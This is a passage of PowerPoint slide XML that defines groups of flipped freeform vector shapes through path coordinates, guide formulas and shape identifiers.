                                <a:pt x="0" y="500"/>
                              </a:moveTo>
                              <a:lnTo>
                                <a:pt x="0" y="2433"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="1866" y="1932"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="1866" y="1001"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="1866" y="0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D6D6D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50" name="Freeform 44">
                          <a:extLst>
                            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1100D1C0-E631-4739-8451-E060B3A78B1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3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030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51" name="Freeform 45">
                          <a:extLst>
                            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B3ED92B9-FCE8-46BA-B160-301A324355C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916" y="1186"/>
                          <a:ext cx="331" cy="433"/>
                        </a:xfrm>
                        <a:custGeom>
                          <a:avLst/>
                          <a:gdLst>
                            <a:gd name="T0" fmla="*/ 0 w 1866"/>
                            <a:gd name="T1" fmla="*/ 2434 h 2434"/>
                            <a:gd name="T2" fmla="*/ 1866 w 1866"/>
                            <a:gd name="T3" fmla="*/ 1933 h 2434"/>
                            <a:gd name="T4" fmla="*/ 1866 w 1866"/>
                            <a:gd name="T5" fmla="*/ 0 h 2434"/>
                            <a:gd name="T6" fmla="*/ 0 w 1866"/>
                            <a:gd name="T7" fmla="*/ 501 h 2434"/>
                            <a:gd name="T8" fmla="*/ 0 w 1866"/>
                            <a:gd name="T9" fmla="*/ 2434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0" y="2434"/>
                              </a:moveTo>
                              <a:lnTo>
                                <a:pt x="1866" y="1933"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="1866" y="0"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="0" y="501"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="0" y="243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28282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52" name="Freeform 46">
                          <a:extLst>
                            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{78DA7C97-46FE-4E54-9245-B6E81A445E88}"/>
                            </a:ext>
                          </a:extLst>
                        </p:cNvPr>
                        <p:cNvSpPr>
                          <a:spLocks noEditPoints="1"/>
                        </p:cNvSpPr>
                        <p:nvPr/>
                      </p:nvSpPr>
                      <p:spPr bwMode="gray">
                        <a:xfrm>
                          <a:off x="585" y="1186"/>
                          <a:ext cx="331" cy="433"/>
                        </a:xfrm>
                        <a:custGeom>
                          <a:avLst/>
                          <a:gdLst>
                            <a:gd name="T0" fmla="*/ 1866 w 1866"/>
                            <a:gd name="T1" fmla="*/ 501 h 2434"/>
                            <a:gd name="T2" fmla="*/ 1632 w 1866"/>
                            <a:gd name="T3" fmla="*/ 437 h 2434"/>
                            <a:gd name="T4" fmla="*/ 1632 w 1866"/>
                            <a:gd name="T5" fmla="*/ 437 h 2434"/>
                            <a:gd name="T6" fmla="*/ 234 w 1866"/>
                            <a:gd name="T7" fmla="*/ 64 h 2434"/>
                            <a:gd name="T8" fmla="*/ 234 w 1866"/>
                            <a:gd name="T9" fmla="*/ 64 h 2434"/>
                            <a:gd name="T10" fmla="*/ 0 w 1866"/>
                            <a:gd name="T11" fmla="*/ 0 h 2434"/>
                            <a:gd name="T12" fmla="*/ 0 w 1866"/>
                            <a:gd name="T13" fmla="*/ 1933 h 2434"/>
                            <a:gd name="T14" fmla="*/ 234 w 1866"/>
                            <a:gd name="T15" fmla="*/ 1997 h 2434"/>
                            <a:gd name="T16" fmla="*/ 234 w 1866"/>
                            <a:gd name="T17" fmla="*/ 1997 h 2434"/>
                            <a:gd name="T18" fmla="*/ 1866 w 1866"/>
                            <a:gd name="T19" fmla="*/ 2434 h 2434"/>
                            <a:gd name="T20" fmla="*/ 1866 w 1866"/>
                            <a:gd name="T21" fmla="*/ 501 h 2434"/>
                            <a:gd name="T22" fmla="*/ 234 w 1866"/>
                            <a:gd name="T23" fmla="*/ 1753 h 2434"/>
                            <a:gd name="T24" fmla="*/ 234 w 1866"/>
                            <a:gd name="T25" fmla="*/ 305 h 2434"/>
                            <a:gd name="T26" fmla="*/ 234 w 1866"/>
                            <a:gd name="T27" fmla="*/ 305 h 2434"/>
                            <a:gd name="T28" fmla="*/ 1630 w 1866"/>
                            <a:gd name="T29" fmla="*/ 681 h 2434"/>
                            <a:gd name="T30" fmla="*/ 1632 w 1866"/>
                            <a:gd name="T31" fmla="*/ 681 h 2434"/>
                            <a:gd name="T32" fmla="*/ 1632 w 1866"/>
                            <a:gd name="T33" fmla="*/ 2129 h 2434"/>
                            <a:gd name="T34" fmla="*/ 234 w 1866"/>
                            <a:gd name="T35" fmla="*/ 1753 h 2434"/>
                            <a:gd name="T36" fmla="*/ 234 w 1866"/>
                            <a:gd name="T37" fmla="*/ 1753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1866" y="501"/>
                              </a:moveTo>
                              <a:lnTo>
                                <a:pt x="1632" y="437"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="1632" y="437"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="234" y="64"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="234" y="64"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="0" y="0"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="0" y="1933"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="234" y="1997"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="234" y="1997"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="1866" y="2434"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="1866" y="501"/>
                              </a:lnTo>
                              <a:close/>
                              <a:moveTo>
                                <a:pt x="234" y="1753"/>
                              </a:moveTo>
                              <a:lnTo>
                                <a:pt x="234" y="305"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="234" y="305"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="1630" y="681"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="1632" y="681"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="1632" y="2129"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="234" y="1753"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="234" y="175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45454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53" name="Freeform 47">
                          <a:extLst>
                            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CCC1659B-19C7-4215-A8BF-681283D311A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E6E6E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837" name="Group 48">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{27537F19-83E3-4FC6-92E4-0ED4CAE6249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 flipH="1">
                        <a:off x="1295" y="2560"/>
                        <a:ext cx="433" cy="341"/>
                        <a:chOff x="585" y="1098"/>
                        <a:chExt cx="662" cy="521"/>
                      </a:xfrm>
                    </p:grpSpPr>
                    <p:sp>
                      <p:nvSpPr>
                        <p:cNvPr id="1844" name="Freeform 49">
                          <a:extLst>
                            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{18169025-86FE-450C-AE06-40BE899DEA6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331" cy="432"/>
                        </a:xfrm>
                        <a:custGeom>
                          <a:avLst/>
                          <a:gdLst>
                            <a:gd name="T0" fmla="*/ 0 w 1866"/>
                            <a:gd name="T1" fmla="*/ 500 h 2433"/>
                            <a:gd name="T2" fmla="*/ 0 w 1866"/>
                            <a:gd name="T3" fmla="*/ 2433 h 2433"/>
                            <a:gd name="T4" fmla="*/ 1866 w 1866"/>
                            <a:gd name="T5" fmla="*/ 1932 h 2433"/>
                            <a:gd name="T6" fmla="*/ 1866 w 1866"/>
                            <a:gd name="T7" fmla="*/ 1001 h 2433"/>
                            <a:gd name="T8" fmla="*/ 1866 w 1866"/>
                            <a:gd name="T9" fmla="*/ 0 h 2433"/>
                            <a:gd name="T10" fmla="*/ 0 w 1866"/>
                            <a:gd name="T11" fmla="*/ 500 h 24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</a:cxnLst>
                          <a:rect l="0" t="0" r="r" b="b"/>
                          <a:pathLst>
                            <a:path w="1866" h="2433">
                              <a:moveTo>
                                <a:pt x="0" y="500"/>
                              </a:moveTo>
                              <a:lnTo>
                                <a:pt x="0" y="2433"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="1866" y="1932"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="1866" y="1001"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="1866" y="0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D6D6D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45" name="Freeform 50">
                          <a:extLst>
                            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B1732C7E-6338-4A38-97FA-72A59F75CF6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3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030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46" name="Freeform 51">
                          <a:extLst>
                            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8DB21031-CB39-47E6-9C03-77EE04DB893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916" y="1186"/>
                          <a:ext cx="331" cy="433"/>
                        </a:xfrm>
                        <a:custGeom>
                          <a:avLst/>
                          <a:gdLst>
                            <a:gd name="T0" fmla="*/ 0 w 1866"/>
                            <a:gd name="T1" fmla="*/ 2434 h 2434"/>
                            <a:gd name="T2" fmla="*/ 1866 w 1866"/>
                            <a:gd name="T3" fmla="*/ 1933 h 2434"/>
                            <a:gd name="T4" fmla="*/ 1866 w 1866"/>
                            <a:gd name="T5" fmla="*/ 0 h 2434"/>
                            <a:gd name="T6" fmla="*/ 0 w 1866"/>
                            <a:gd name="T7" fmla="*/ 501 h 2434"/>
                            <a:gd name="T8" fmla="*/ 0 w 1866"/>
                            <a:gd name="T9" fmla="*/ 2434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0" y="2434"/>
                              </a:moveTo>
                              <a:lnTo>
                                <a:pt x="1866" y="1933"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="1866" y="0"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="0" y="501"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="0" y="243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28282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47" name="Freeform 52">
                          <a:extLst>
                            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D9324B92-AFC5-4706-8AD0-25C28F90FE48}"/>
                            </a:ext>
                          </a:extLst>
                        </p:cNvPr>
                        <p:cNvSpPr>
                          <a:spLocks noEditPoints="1"/>
                        </p:cNvSpPr>
                        <p:nvPr/>
                      </p:nvSpPr>
                      <p:spPr bwMode="gray">
                        <a:xfrm>
                          <a:off x="585" y="1186"/>
                          <a:ext cx="331" cy="433"/>
                        </a:xfrm>
                        <a:custGeom>
                          <a:avLst/>
                          <a:gdLst>
                            <a:gd name="T0" fmla="*/ 1866 w 1866"/>
                            <a:gd name="T1" fmla="*/ 501 h 2434"/>
                            <a:gd name="T2" fmla="*/ 1632 w 1866"/>
                            <a:gd name="T3" fmla="*/ 437 h 2434"/>
                            <a:gd name="T4" fmla="*/ 1632 w 1866"/>
                            <a:gd name="T5" fmla="*/ 437 h 2434"/>
                            <a:gd name="T6" fmla="*/ 234 w 1866"/>
                            <a:gd name="T7" fmla="*/ 64 h 2434"/>
                            <a:gd name="T8" fmla="*/ 234 w 1866"/>
                            <a:gd name="T9" fmla="*/ 64 h 2434"/>
                            <a:gd name="T10" fmla="*/ 0 w 1866"/>
                            <a:gd name="T11" fmla="*/ 0 h 2434"/>
                            <a:gd name="T12" fmla="*/ 0 w 1866"/>
                            <a:gd name="T13" fmla="*/ 1933 h 2434"/>
                            <a:gd name="T14" fmla="*/ 234 w 1866"/>
                            <a:gd name="T15" fmla="*/ 1997 h 2434"/>
                            <a:gd name="T16" fmla="*/ 234 w 1866"/>
                            <a:gd name="T17" fmla="*/ 1997 h 2434"/>
                            <a:gd name="T18" fmla="*/ 1866 w 1866"/>
                            <a:gd name="T19" fmla="*/ 2434 h 2434"/>
                            <a:gd name="T20" fmla="*/ 1866 w 1866"/>
                            <a:gd name="T21" fmla="*/ 501 h 2434"/>
                            <a:gd name="T22" fmla="*/ 234 w 1866"/>
                            <a:gd name="T23" fmla="*/ 1753 h 2434"/>
                            <a:gd name="T24" fmla="*/ 234 w 1866"/>
                            <a:gd name="T25" fmla="*/ 305 h 2434"/>
                            <a:gd name="T26" fmla="*/ 234 w 1866"/>
                            <a:gd name="T27" fmla="*/ 305 h 2434"/>
                            <a:gd name="T28" fmla="*/ 1630 w 1866"/>
                            <a:gd name="T29" fmla="*/ 681 h 2434"/>
                            <a:gd name="T30" fmla="*/ 1632 w 1866"/>
                            <a:gd name="T31" fmla="*/ 681 h 2434"/>
                            <a:gd name="T32" fmla="*/ 1632 w 1866"/>
                            <a:gd name="T33" fmla="*/ 2129 h 2434"/>
                            <a:gd name="T34" fmla="*/ 234 w 1866"/>
                            <a:gd name="T35" fmla="*/ 1753 h 2434"/>
                            <a:gd name="T36" fmla="*/ 234 w 1866"/>
                            <a:gd name="T37" fmla="*/ 1753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1866" y="501"/>
                              </a:moveTo>
                              <a:lnTo>
                                <a:pt x="1632" y="437"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="1632" y="437"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="234" y="64"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="234" y="64"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="0" y="0"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="0" y="1933"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="234" y="1997"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="234" y="1997"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="1866" y="2434"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="1866" y="501"/>
                              </a:lnTo>
                              <a:close/>
                              <a:moveTo>
                                <a:pt x="234" y="1753"/>
                              </a:moveTo>
                              <a:lnTo>
                                <a:pt x="234" y="305"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="234" y="305"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="1630" y="681"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="1632" y="681"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="1632" y="2129"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="234" y="1753"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="234" y="175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45454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48" name="Freeform 53">
                          <a:extLst>
                            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FCC80B7C-718D-4CFA-A02E-3188EC03457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E6E6E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838" name="Group 54">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FFF309C4-82CA-45D4-B943-4CD3FF718FE2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 flipH="1">
                        <a:off x="1079" y="2618"/>
                        <a:ext cx="433" cy="341"/>
                        <a:chOff x="585" y="1098"/>
                        <a:chExt cx="662" cy="521"/>
                      </a:xfrm>
                    </p:grpSpPr>
                    <p:sp>
                      <p:nvSpPr>
                        <p:cNvPr id="1839" name="Freeform 55">
                          <a:extLst>
                            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{60159E0E-9238-487D-BD84-3F97DBEC612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331" cy="432"/>
                        </a:xfrm>
                        <a:custGeom>
                          <a:avLst/>
                          <a:gdLst>
                            <a:gd name="T0" fmla="*/ 0 w 1866"/>
                            <a:gd name="T1" fmla="*/ 500 h 2433"/>
                            <a:gd name="T2" fmla="*/ 0 w 1866"/>
                            <a:gd name="T3" fmla="*/ 2433 h 2433"/>
                            <a:gd name="T4" fmla="*/ 1866 w 1866"/>
                            <a:gd name="T5" fmla="*/ 1932 h 2433"/>
                            <a:gd name="T6" fmla="*/ 1866 w 1866"/>
                            <a:gd name="T7" fmla="*/ 1001 h 2433"/>
                            <a:gd name="T8" fmla="*/ 1866 w 1866"/>
                            <a:gd name="T9" fmla="*/ 0 h 2433"/>
                            <a:gd name="T10" fmla="*/ 0 w 1866"/>
                            <a:gd name="T11" fmla="*/ 500 h 24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</a:cxnLst>
                          <a:rect l="0" t="0" r="r" b="b"/>
                          <a:pathLst>
                            <a:path w="1866" h="2433">
                              <a:moveTo>
                                <a:pt x="0" y="500"/>
                              </a:moveTo>
                              <a:lnTo>
                                <a:pt x="0" y="2433"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="1866" y="1932"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="1866" y="1001"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="1866" y="0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D6D6D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40" name="Freeform 56">
                          <a:extLst>
                            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{08AC6CEE-283C-43A8-BCCE-714A98C92CB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3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030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41" name="Freeform 57">
                          <a:extLst>
                            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{40624921-5D00-4D0A-AB4C-079DE616079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916" y="1186"/>
                          <a:ext cx="331" cy="433"/>
                        </a:xfrm>
                        <a:custGeom>
                          <a:avLst/>
                          <a:gdLst>
                            <a:gd name="T0" fmla="*/ 0 w 1866"/>
                            <a:gd name="T1" fmla="*/ 2434 h 2434"/>
                            <a:gd name="T2" fmla="*/ 1866 w 1866"/>
                            <a:gd name="T3" fmla="*/ 1933 h 2434"/>
                            <a:gd name="T4" fmla="*/ 1866 w 1866"/>
                            <a:gd name="T5" fmla="*/ 0 h 2434"/>
                            <a:gd name="T6" fmla="*/ 0 w 1866"/>
                            <a:gd name="T7" fmla="*/ 501 h 2434"/>
                            <a:gd name="T8" fmla="*/ 0 w 1866"/>
                            <a:gd name="T9" fmla="*/ 2434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0" y="2434"/>
                              </a:moveTo>
                              <a:lnTo>
                                <a:pt x="1866" y="1933"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="1866" y="0"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="0" y="501"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="0" y="243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28282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42" name="Freeform 58">
                          <a:extLst>
                            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{88B406E7-6237-4814-AEE4-8FE48EB148F2}"/>
                            </a:ext>
                          </a:extLst>
                        </p:cNvPr>
                        <p:cNvSpPr>
                          <a:spLocks noEditPoints="1"/>
                        </p:cNvSpPr>
                        <p:nvPr/>
                      </p:nvSpPr>
                      <p:spPr bwMode="gray">
                        <a:xfrm>
                          <a:off x="585" y="1186"/>
                          <a:ext cx="331" cy="433"/>
                        </a:xfrm>
                        <a:custGeom>
                          <a:avLst/>
                          <a:gdLst>
                            <a:gd name="T0" fmla="*/ 1866 w 1866"/>
                            <a:gd name="T1" fmla="*/ 501 h 2434"/>
                            <a:gd name="T2" fmla="*/ 1632 w 1866"/>
                            <a:gd name="T3" fmla="*/ 437 h 2434"/>
                            <a:gd name="T4" fmla="*/ 1632 w 1866"/>
                            <a:gd name="T5" fmla="*/ 437 h 2434"/>
                            <a:gd name="T6" fmla="*/ 234 w 1866"/>
                            <a:gd name="T7" fmla="*/ 64 h 2434"/>
                            <a:gd name="T8" fmla="*/ 234 w 1866"/>
                            <a:gd name="T9" fmla="*/ 64 h 2434"/>
                            <a:gd name="T10" fmla="*/ 0 w 1866"/>
                            <a:gd name="T11" fmla="*/ 0 h 2434"/>
                            <a:gd name="T12" fmla="*/ 0 w 1866"/>
                            <a:gd name="T13" fmla="*/ 1933 h 2434"/>
                            <a:gd name="T14" fmla="*/ 234 w 1866"/>
                            <a:gd name="T15" fmla="*/ 1997 h 2434"/>
                            <a:gd name="T16" fmla="*/ 234 w 1866"/>
                            <a:gd name="T17" fmla="*/ 1997 h 2434"/>
                            <a:gd name="T18" fmla="*/ 1866 w 1866"/>
                            <a:gd name="T19" fmla="*/ 2434 h 2434"/>
                            <a:gd name="T20" fmla="*/ 1866 w 1866"/>
                            <a:gd name="T21" fmla="*/ 501 h 2434"/>
                            <a:gd name="T22" fmla="*/ 234 w 1866"/>
                            <a:gd name="T23" fmla="*/ 1753 h 2434"/>
                            <a:gd name="T24" fmla="*/ 234 w 1866"/>
                            <a:gd name="T25" fmla="*/ 305 h 2434"/>
                            <a:gd name="T26" fmla="*/ 234 w 1866"/>
                            <a:gd name="T27" fmla="*/ 305 h 2434"/>
                            <a:gd name="T28" fmla="*/ 1630 w 1866"/>
                            <a:gd name="T29" fmla="*/ 681 h 2434"/>
                            <a:gd name="T30" fmla="*/ 1632 w 1866"/>
                            <a:gd name="T31" fmla="*/ 681 h 2434"/>
                            <a:gd name="T32" fmla="*/ 1632 w 1866"/>
                            <a:gd name="T33" fmla="*/ 2129 h 2434"/>
                            <a:gd name="T34" fmla="*/ 234 w 1866"/>
                            <a:gd name="T35" fmla="*/ 1753 h 2434"/>
                            <a:gd name="T36" fmla="*/ 234 w 1866"/>
                            <a:gd name="T37" fmla="*/ 1753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1866" y="501"/>
                              </a:moveTo>
                              <a:lnTo>
                                <a:pt x="1632" y="437"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="1632" y="437"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="234" y="64"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="234" y="64"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="0" y="0"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="0" y="1933"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="234" y="1997"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="234" y="1997"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="1866" y="2434"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="1866" y="501"/>
                              </a:lnTo>
                              <a:close/>
                              <a:moveTo>
                                <a:pt x="234" y="1753"/>
                              </a:moveTo>
                              <a:lnTo>
                                <a:pt x="234" y="305"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="234" y="305"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="1630" y="681"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="1632" y="681"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="1632" y="2129"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="234" y="1753"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="234" y="175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45454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43" name="Freeform 59">
                          <a:extLst>
                            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{65541919-C7AC-40B7-8E28-D36B880760B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E6E6E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741" name="Group 60">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8015541F-D4ED-4583-B0B7-C37B633F8A0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079" y="2160"/>
                      <a:ext cx="1300" cy="574"/>
                      <a:chOff x="1079" y="2160"/>
                      <a:chExt cx="1300" cy="574"/>
                    </a:xfrm>
                  </p:grpSpPr>
                  <p:grpSp>
                    <p:nvGrpSpPr>
                      <p:cNvPr id="1804" name="Group 61">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BF23C243-AC0E-4F9B-9BBF-006E78CF73DB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 flipH="1">
                        <a:off x="1946" y="2160"/>
                        <a:ext cx="433" cy="341"/>
                        <a:chOff x="585" y="1098"/>
                        <a:chExt cx="662" cy="521"/>
                      </a:xfrm>
                    </p:grpSpPr>
                    <p:sp>
                      <p:nvSpPr>
                        <p:cNvPr id="1829" name="Freeform 62">
                          <a:extLst>
                            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9A6E1DEB-5C8B-46B4-920F-0D3D34DEB70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331" cy="432"/>
                        </a:xfrm>
                        <a:custGeom>
                          <a:avLst/>
                          <a:gdLst>
                            <a:gd name="T0" fmla="*/ 0 w 1866"/>
                            <a:gd name="T1" fmla="*/ 500 h 2433"/>
                            <a:gd name="T2" fmla="*/ 0 w 1866"/>
                            <a:gd name="T3" fmla="*/ 2433 h 2433"/>
                            <a:gd name="T4" fmla="*/ 1866 w 1866"/>
                            <a:gd name="T5" fmla="*/ 1932 h 2433"/>
                            <a:gd name="T6" fmla="*/ 1866 w 1866"/>
                            <a:gd name="T7" fmla="*/ 1001 h 2433"/>
                            <a:gd name="T8" fmla="*/ 1866 w 1866"/>
                            <a:gd name="T9" fmla="*/ 0 h 2433"/>
                            <a:gd name="T10" fmla="*/ 0 w 1866"/>
                            <a:gd name="T11" fmla="*/ 500 h 24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</a:cxnLst>
                          <a:rect l="0" t="0" r="r" b="b"/>
                          <a:pathLst>
                            <a:path w="1866" h="2433">
                              <a:moveTo>
                                <a:pt x="0" y="500"/>
                              </a:moveTo>
                              <a:lnTo>
                                <a:pt x="0" y="2433"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="1866" y="1932"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="1866" y="1001"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="1866" y="0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D6D6D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30" name="Freeform 63">
                          <a:extLst>
                            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{203E77DF-C0AB-4529-A21E-ED1620FE68B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3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030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31" name="Freeform 64">
                          <a:extLst>
                            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{32E80E5B-7DF7-4FB6-B3C2-346661A8582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916" y="1186"/>
                          <a:ext cx="331" cy="433"/>
                        </a:xfrm>
                        <a:custGeom>
                          <a:avLst/>
                          <a:gdLst>
                            <a:gd name="T0" fmla="*/ 0 w 1866"/>
                            <a:gd name="T1" fmla="*/ 2434 h 2434"/>
                            <a:gd name="T2" fmla="*/ 1866 w 1866"/>
                            <a:gd name="T3" fmla="*/ 1933 h 2434"/>
                            <a:gd name="T4" fmla="*/ 1866 w 1866"/>
                            <a:gd name="T5" fmla="*/ 0 h 2434"/>
                            <a:gd name="T6" fmla="*/ 0 w 1866"/>
                            <a:gd name="T7" fmla="*/ 501 h 2434"/>
                            <a:gd name="T8" fmla="*/ 0 w 1866"/>
                            <a:gd name="T9" fmla="*/ 2434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0" y="2434"/>
                              </a:moveTo>
                              <a:lnTo>
                                <a:pt x="1866" y="1933"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="1866" y="0"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="0" y="501"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="0" y="243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28282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32" name="Freeform 65">
                          <a:extLst>
                            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{35AA0EB2-E897-45C5-BE79-754E126AAC64}"/>
                            </a:ext>
                          </a:extLst>
                        </p:cNvPr>
                        <p:cNvSpPr>
                          <a:spLocks noEditPoints="1"/>
                        </p:cNvSpPr>
                        <p:nvPr/>
                      </p:nvSpPr>
                      <p:spPr bwMode="gray">
                        <a:xfrm>
                          <a:off x="585" y="1186"/>
                          <a:ext cx="331" cy="433"/>
                        </a:xfrm>
                        <a:custGeom>
                          <a:avLst/>
                          <a:gdLst>
                            <a:gd name="T0" fmla="*/ 1866 w 1866"/>
                            <a:gd name="T1" fmla="*/ 501 h 2434"/>
                            <a:gd name="T2" fmla="*/ 1632 w 1866"/>
                            <a:gd name="T3" fmla="*/ 437 h 2434"/>
                            <a:gd name="T4" fmla="*/ 1632 w 1866"/>
                            <a:gd name="T5" fmla="*/ 437 h 2434"/>
                            <a:gd name="T6" fmla="*/ 234 w 1866"/>
                            <a:gd name="T7" fmla="*/ 64 h 2434"/>
                            <a:gd name="T8" fmla="*/ 234 w 1866"/>
                            <a:gd name="T9" fmla="*/ 64 h 2434"/>
                            <a:gd name="T10" fmla="*/ 0 w 1866"/>
                            <a:gd name="T11" fmla="*/ 0 h 2434"/>
                            <a:gd name="T12" fmla="*/ 0 w 1866"/>
                            <a:gd name="T13" fmla="*/ 1933 h 2434"/>
